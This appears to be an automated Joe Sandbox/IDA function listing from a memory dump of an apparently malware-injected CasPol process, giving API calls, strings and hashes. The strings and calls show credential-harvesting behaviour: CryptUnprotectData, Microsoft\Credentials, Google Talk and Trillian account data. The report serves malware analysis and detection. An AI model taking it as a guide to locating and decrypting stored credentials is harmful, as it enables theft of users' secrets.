                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                    • API String ID: 2959138223-1079885057
                                                                                                                                                                                    • Opcode ID: a61bd0733ec224b38154a4f2ff7882c534965ab0212f33104a31c91c9fdff71e
                                                                                                                                                                                    • Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
                                                                                                                                                                                    • Opcode Fuzzy Hash: a61bd0733ec224b38154a4f2ff7882c534965ab0212f33104a31c91c9fdff71e
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5
                                                                                                                                                                                    Function 0041223F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll), ref: 004121A0
                                                                                                                                                                                      • Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                    • memset.MSVCRT ref: 00412297
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                                                                      • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                    • API String ID: 3929982141-2036018995
                                                                                                                                                                                    • Opcode ID: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                                                                                                                                                                    • Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
                                                                                                                                                                                    • Opcode Fuzzy Hash: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E
                                                                                                                                                                                    Function 0040C427 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject
                                                                                                                                                                                    • String ID: ;@
                                                                                                                                                                                    • API String ID: 1986663749-2925476404
                                                                                                                                                                                    • Opcode ID: 462c25ec0a62c83cd232211add7106b677ed3de08da03debaff4362743836162
                                                                                                                                                                                    • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 462c25ec0a62c83cd232211add7106b677ed3de08da03debaff4362743836162
                                                                                                                                                                                    • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                                                                                                                                                                    Function 00404C9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                    • API String ID: 145871493-1827663648
                                                                                                                                                                                    • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                    • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                                                                                                                                                                    Function 00411C8F Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00411CB8
                                                                                                                                                                                      • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                                                                                                      • Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                                                                                                    • memset.MSVCRT ref: 00411CF4
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                    • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                    • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                                                                                                                                                                    Function 0041208B Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                    • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                                                                                                                                                                    Function 0040D935 Relevance: 4.5, APIs: 3, Instructions: 46COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D959
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                                                                                                                                                                      • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                      • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                                                                                                                                                                      • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                                                                                                                                                                      • Part of subcall function 0040D794: atoi.MSVCRT(?), ref: 0040D840
                                                                                                                                                                                      • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                                                                                                                                                                      • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?), ref: 0040D8B3
                                                                                                                                                                                      • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?,?,?), ref: 0040D8C6
                                                                                                                                                                                      • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2578913611-0
                                                                                                                                                                                    • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                                                                    • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                                                                                                                                                                    Function 00406982 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 0040699E
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004040EC,00000001,?,?,00000000,004038B8,?), ref: 004069B6
                                                                                                                                                                                    • free.MSVCRT ref: 004069BF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                    • Opcode ID: 7e4423998a5bf6bfb607acc7ce6a47bafa0b80d87e5f9d0a99af9475c24ad546
                                                                                                                                                                                    • Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e4423998a5bf6bfb607acc7ce6a47bafa0b80d87e5f9d0a99af9475c24ad546
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8
                                                                                                                                                                                    Function 00410383 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,CryptUnprotectData), ref: 004103C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Version_mbscpy
                                                                                                                                                                                    • String ID: CryptUnprotectData
                                                                                                                                                                                    • API String ID: 1856898028-1975210251
                                                                                                                                                                                    • Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                                                                                                                                                                    • Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
                                                                                                                                                                                    • Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E
                                                                                                                                                                                    Function 00414DB1 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: 043642bf5cdc1de150e3446c738409664b5144c0223cf5edf213a9aa475217cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621E7311493416FEB218B745C017E6BBD8ABA7374F19469BD044CB283D26D98C693AE
                                                                                                                                                                                    Function 0040C5A4 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 1439213657-3817206916
                                                                                                                                                                                    • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                                                                                                                                                                    • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                                                                                                                                                                    • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
                                                                                                                                                                                    Function 00414DF0 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 25f2d81c04f4c45cc56d7cc0e98a54f4dee55ba3048ec5225fe48b17b8cda6c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9101DB3058570179AB2166754C02AFBAF987AE3364F18074BB05497293CA5C89C683BD
                                                                                                                                                                                    Function 00414E0D Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 94a9458822a42be4aa48e0704f6d9666272a38e661a699dcd97394ecc6966311
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F022602857003CEF3155B41C42AFB9F8CAAE7360F280A4BF014C7283C59C888683BE
                                                                                                                                                                                    Function 0040E675 Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E695
                                                                                                                                                                                      • Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040E6B1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CompareFileTimememsetstrrchr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4226234548-0
                                                                                                                                                                                    • Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                                                                                                                                                                    • Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                                                                                                                                                                    • Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95
                                                                                                                                                                                    Function 00404380 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004043A1
                                                                                                                                                                                      • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                      • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                                                      • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                                                                      • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
                                                                                                                                                                                      • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22
                                                                                                                                                                                      • Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscat$FolderPathSpecial_strnicmpmemset
                                                                                                                                                                                    • String ID: Microsoft\Credentials
                                                                                                                                                                                    • API String ID: 3139367858-3148402405
                                                                                                                                                                                    • Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                                                                                                                                                                    • Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
                                                                                                                                                                                    • Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5
                                                                                                                                                                                    Function 00411EC1 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString$Write
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2948465352-0
                                                                                                                                                                                    • Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                                                                                                                                                                    • Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
                                                                                                                                                                                    • Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4
                                                                                                                                                                                    Function 00410D6F Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?,004066D9), ref: 00410D78
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 00410D80
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentDirectoryFreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2760881011-0
                                                                                                                                                                                    • Opcode ID: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                    • Instruction ID: c686a64e774c0d910729c20308bd6d7dac36cbeeda648e68b024901bbde96cda
                                                                                                                                                                                    • Opcode Fuzzy Hash: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DC00239000A01DFD7219FA0E808BE5BBF4BF48342FA8496DE1C581064E7799594CF48
                                                                                                                                                                                    Function 0040D9B9 Relevance: 2.6, APIs: 2, Instructions: 57COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D9E1
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D9F8
                                                                                                                                                                                      • Part of subcall function 00413735: memset.MSVCRT ref: 00413757
                                                                                                                                                                                      • Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                                                                                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Closememcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1317463181-0
                                                                                                                                                                                    • Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                                                                                                                                                                    • Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65
                                                                                                                                                                                    Function 0040F9A0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
                                                                                                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
                                                                                                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
                                                                                                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
                                                                                                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
                                                                                                                                                                                      • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                                                                                                                                                                      • Part of subcall function 00406D2B: CloseHandle.KERNEL32(00000000), ref: 00406D4F
                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
